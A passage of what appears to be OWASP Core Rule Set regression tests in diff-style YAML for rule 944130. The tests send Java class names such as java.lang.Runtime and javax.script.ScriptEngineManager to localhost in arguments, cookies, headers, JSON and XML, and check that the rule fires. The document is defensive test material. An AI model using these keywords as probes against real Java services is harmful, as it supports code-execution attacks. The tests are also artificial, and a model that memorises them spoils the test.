stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-337 + desc: "XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-338 + desc: "Nested XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-339 + desc: "Content-Type text/plain includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-340 + desc: "Content-Type application/json arg value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-341 + desc: "Content-Type application/json arg name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-342 + desc: "Argument test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-343 + desc: "Argument name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-344 + desc: "Cookie test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-345 + desc: "Cookie name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-346 + desc: "Request header test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-347 + desc: "XML attribute value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-348 + desc: "XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-349 + desc: "Nested XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-350 + desc: "Content-Type text/plain includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-351 + desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-352 + desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-353 + desc: "Argument test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-354 + desc: "Argument name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-355 + desc: "Cookie test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-356 + desc: "Cookie name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-357 + desc: "Request header test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-358 + desc: "XML attribute value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-359 + desc: "XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-360 + desc: "Nested XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-361 + desc: "Content-Type text/plain includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-362 + desc: "Content-Type application/json arg value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-363 + desc: "Content-Type application/json arg name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-364 + desc: "Argument test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-365 + desc: "Argument name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-366 + desc: "Cookie test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-367 + desc: "Cookie name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-368 + desc: "Request header test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-369 + desc: "XML attribute value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-370 + desc: "XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-371 + desc: "Nested XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-372 + desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-373 + desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-374 + desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-375 + desc: "Argument test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-376 + desc: "Argument name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-377 + desc: "Cookie test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-378 + desc: "Cookie name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-379 + desc: "Request header test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-380 + desc: "XML attribute value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-381 + desc: "XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-382 + desc: "Nested XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-383 + desc: "Content-Type text/plain includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-384 + desc: "Content-Type application/json arg value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-385 + desc: "Content-Type application/json arg name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-386 + desc: "Argument test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-387 + desc: "Argument name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-388 + desc: "Cookie test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-389 + desc: "Cookie name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: javax.script.ScriptEngineManager=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-390 + desc: "Request header test includes keyword javax.script.ScriptEngineManager" + stages: 